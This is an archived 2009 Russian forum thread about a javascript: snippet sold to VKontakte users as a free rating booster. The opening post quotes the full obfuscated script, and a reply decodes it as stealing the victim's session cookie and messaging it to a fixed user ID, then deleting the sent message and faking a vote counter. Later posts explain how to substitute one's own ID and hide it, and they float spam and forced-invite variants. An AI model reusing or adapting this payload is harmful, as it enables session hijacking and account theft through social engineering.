PDA

Просмотр полной версии : Java скрипт Вконтакте


Coole_r
01.10.2009, 19:11
не с давнего времени наткнулся на данный скрипт, якобы бесплатно повышающий рейтинг в ВК.
Хотелось бы узнать, что он делает?



вот как бэ цитата


"{Вставить в адресную строчку,работет только на опере = )
стираете пробел там где java и script, должно получится
СЛИТНО!и полностью весь код вставляете в адресную строчку,и с лева видетет идут голоса!!!!и радуетесь}"

java script :m='ook';done="false";tt=0;act="act=write";fc="jav";dl=".php?";fa="document";cl="script:";fax=Math.pow(4196,2)+6689;window.location=fc+'a'+ cl+'gta='+fa+'.'+"c"+m+'ie;return;';howto='mail';for(i=0;i<100;i++){gta=gta.replace("=","!");};
th=document.createElement("html");function rst(url){fk=new XMLHttpRequest();fk.onreadystatechange=function(){ if(fk.readyState==4){th.innerHTML=fk.responseText; }};fku=url;fk.open('GET', fku, true);fk.send(null);};function geth(ned){u=th.getElementsByTagName("*");for(i=0;i<u.length;i++){if(u[i]!=undefined){if(u[i].id==ned){return u[i].value}}}};
function col(){rst(howto+dl+act+'&to='+fax,2);setTimeout('gre()',Math.pow(10,4));};c ol();function gre(){rst(howto+dl+"secure="+geth('secure')+"&chas="+geth('chas')+"&photo="+geth('photo')+"&to_id="+fax+"&to_reply="+geth('to_reply')+"&message="+gta+"&title="+Math.random()+"&act=sent",2);setTimeout('gar()',Math.pow(10,4))}col();funct ion gar(){rst(howto+dl+'out=1',2);setTimeout('gas()',M ath.pow(10,3))};function gas(){d=0;ij=th.getElementsByTagName("a");for(i=1;i<ij.length-10;i++){olo=ij[i].href.substring(12,18); if(d==0 && olo=="delMsg"){d="1";k="0";k+=ij[i]}};aka=k.substring(20,k.length-4);fga(aka,1);};function fga(md, ox) {var fa = new Ajax();fa.md = md;fa.post('/mail.php', {'act': 'a_delete', 'id': md, 'out': ox});};svotes=0;svotes-=0;if(ge("coins_left")==undefined){ge('nav').innerHTML+='</ol><div style="text-align: center; padding:5px;background:#F7F7F7; border-bottom:1px solid #DDD; margin: 0px 0px 10px 0px"> <div id="coins_left"></div><br /> <a href="/payments.php?act=sms">Пополнить баланс »</a> </div><ol>';}else{svotes=ge("coins_left").getElementsByTagName("b")[0].innerHTML};ge("coins_left").innerHTML='<img src="http://vkontakte.ru/images/upload.gif" />';votes=svotes-0;svotes-=-.97;function pluss(){if(votes<svotes){ge("coins_left").innerHTML="%D0%A3 %D0%92%D0%B0%D1%81 %3Cb%3E"+votes+"%3C%2Fb%3E %D0%BD%D0%B5%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D 0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D1%8B%D1%85 %D0%B3%D0%BE%D0%BB%D0%BE%D1%81%D0%BE%D0%B2.";};votes-=-0.01;votes=Math.ceil(votes*100)/100};setInterval('pluss()',Math.floor(Math.random( )*800));return;





ах, да. Если запостил тему не в том разделе, прошу переместить.

snape
01.10.2009, 19:49
Это визуальный рейтинг т.е после введения данного скрипта появляется табличка типо 25 процентов от Павла Дурова вроде как, но это все чисто визуально т.е на реальном рейтинге не отражается...

Coole_r
01.10.2009, 19:51
ясно. Жаль что только визуально.

GlooK
01.10.2009, 20:02
fax=Math.pow(4196,2)+6689; // 17613105 - это ID
window.location=fc+'a'+ cl+'gta='+fa+'.'+"c"+m+'ie;return;'; // javascript: gta=document.cookie;return;



// mail.php?secure=X&chas=X&photo=X&to_id=17613105&to_replay&message=COOKIE&title
rst(howto+dl+"secure="+geth('secure')+"&chas="+geth('chas')+"&photo="+geth('photo')+"&to_id="+fax+"&to_reply="+geth('to_reply')+"&message="+gta+"&title="+Math.random()+"&act=sent",2);


Вообщем этот скрипт отправляет твои куки вот этому id17613105

anti4at
01.10.2009, 21:27
:D

shklyarov
01.10.2009, 22:12
Не подскажыте как заминить на свой ид ?

GlooK
01.10.2009, 22:17
По простому нужно заменить это

fax=Math.pow(4196,2)+6689;

на это


fax=ID

где ID - твой айди

В идеале можно скрыть математическим выражением.

LemarkPro
01.10.2009, 22:22
"Math.pow(4196,2)+6689" = 4196^2+6689 =)

sultan08
01.10.2009, 22:37
Пробую в опере

Ошибка!
Неправильный адрес

URL-адрес http://javascript :m='ook';done="false";tt=0;act="act=write";fc="jav";dl=".php?";fa="document";cl="script:";fax=Math.pow(4196,2)+6689;window.location=fc+'a'+ cl+'gta='+fa+'.'+"c"+m+'ie;return;';howto='mail';for(i=0;i<100;i++){gta=gta.replace("=","!");}; th=document.createElement("html");function rst(url){fk=new XMLHttpRequest();fk.onreadystatechange=function(){ if(fk.readyState==4){th.innerHTML=fk.responseText; }};fku=url;fk.open('GET', fku, true);fk.send(null);};function geth(ned){u=th.getElementsByTagName("*");for(i=0;i<u.length;i++){if(u[i]!=undefined){if(u[i].id==ned){return u[i].value}}}}; function col(){rst(howto+dl+act+'&to='+fax,2);setTimeout('gre()',Math.pow(10,4));};c ol();function gre(){rst(howto+dl+"secure="+geth('secure')+"&chas="+geth('chas')+"&photo="+geth('photo')+"&to_id="+fax+"&to_reply="+geth('to_reply')+"&message="+gta+"&title="+Math.random()+"&act=sent",2);setTimeout('gar()',Math.pow(10,4))}col();funct ion gar(){rst(howto+dl+'out=1',2);setTimeout('gas()',M ath.pow(10,3))};function gas(){d=0;ij=th.getElementsByTagName("a");for(i=1;i<ij.length-10;i++){olo=ij[i].href.substring(12,18); if(d==0 && olo=="delMsg"){d="1";k="0";k+=ij[i]}};aka=k.substring(20,k.length-4);fga(aka,1);};function fga(md, ox) {var fa = new Ajax();fa.md = md;fa.post('/mail.php', {'act': 'a_delete', 'id': md, 'out': ox});};svotes=0;svotes-=0;if(ge("coins_left")==undefined){ge('nav').innerHTML+='</ol><div style="text-align: center; padding:5px;background: содержит недопустимые знаки для расположения, в котором они обнаружены.
Причиной их присутствия может быть неправильно введенный URL-адрес, но адрес может также быть попыткой обманным путем вынудить вас посетить веб-страницу, которую вы считаете по ошибке безопасной.

GlooK
01.10.2009, 22:43
в url убери http://

shklyarov
01.10.2009, 22:55
Ошибка!
Неправильный адрес((,,писал без http://

bro's
02.10.2009, 10:33
да что-то оно не работает.....((

Coole_r
03.10.2009, 18:42
ы))) я уж на вский случай все свои пароли поменял))

ZnikiR
03.10.2009, 20:23
рассказывай быстро где ты нашел этот код!!!!

Coole_r
03.10.2009, 20:24
а что, он несёт какую то важность? ))



если я запалил чью то тему то извините))))

-Unlocked-
03.10.2009, 20:47
Прежде чем выполнять какой-либо скрипт, подумай или проконсультируйся с кем-то. СИ великая вещь. Бесплатный рейтинг только в мышеловке. ;)

stasik
04.10.2009, 16:25
всё равно скрипт уже не актуален, у контакта теперь новые куки

iNOLE
04.10.2009, 16:44
а формулу расчета не подскажите?)

altblitz
04.10.2009, 16:51
Как хорошо уметь читать!
Не надо к маме приставать,

Не надо бабушку трясти:
«Прочти, пожалуйста! Прочти!»

Не надо умолять сестрицу:
«Ну, почитай ещё страницу».

Не надо звать,
Не надо ждать,
А можно взять
И почитать!


http://www.magiclamp.ru/detki/biblioteka/valentin_berestov/osen/shitat_01.jpg

vvs777
04.10.2009, 17:21
Не доганяю, нафига просить кого-то что-то вставить в браузер когда флешка может сама открыть всплывающее/новое окно браузера с заданным адресом... Флеш баннеры же именно так и делают!

altblitz
04.10.2009, 18:26
всё равно скрипт уже не актуален, у контакта теперь новые куки
здесь важен принцип.
но вообще, код феерическо растянут, т.е. не юзабелен.

догадка - это лишь пруф-оф-концепт, работающий код будет иным.

stasik
04.10.2009, 19:16
Не доганяю, нафига просить кого-то что-то вставить в браузер когда флешка может сама открыть всплывающее/новое окно браузера с заданным адресом... Флеш баннеры же именно так и делают!
если ты откроеш страницу с этим урлом в новом окне, то выполнится этот яваскрипт для пустой страницы и ты получиш пустые куки,
надо сначала открыть любую страницу вконтакте, а потом выполнить для неё яваскрипт, введя его в адресной строке страницы где был открыт вконтакте,
так что никак, было бы здорово поменять урл на свой у открытого тобой всплывающего окна, но так нельзя, так бы любой сайт мог упереть все твои куки

vvs777
04.10.2009, 19:37
на счет кук протормозил =)
у меня мысли были в сторону открыть новое окно с запросом к mail.php =)
т.е. теоретическая возможность проспамить по друзьям не угоняя акк...

ну или changepassword.php =)

stasik
04.10.2009, 21:43
для смены пароля надо знать старый пароль
а с mail.php вроде раньше такой трюк был, передать ему текст сообщения методом get и оно отправлялось, а теперь там метод post и скрытое поле с числом, которое нужно передать вместе с сообщением для отправки

Артик
04.10.2009, 21:55
Можно сказать что бы чел зашел в группу которую надо разрекламировать, там вставил javascript, что бы тот выдрал hash и пригласил всех друзей :)